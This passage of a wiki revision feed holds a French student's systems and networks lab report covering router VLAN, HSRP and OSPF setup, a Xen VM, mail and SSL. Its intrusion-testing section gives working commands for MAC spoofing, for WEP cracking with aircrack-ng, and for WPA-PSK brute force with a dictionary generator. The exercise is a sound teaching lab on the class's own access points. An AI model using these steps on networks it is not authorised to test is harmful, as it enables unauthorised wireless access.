Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23147</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23147"/>
				<updated>2015-11-23T15:16:46Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;1&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Network&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23143</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23143"/>
				<updated>2015-11-23T15:14:11Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
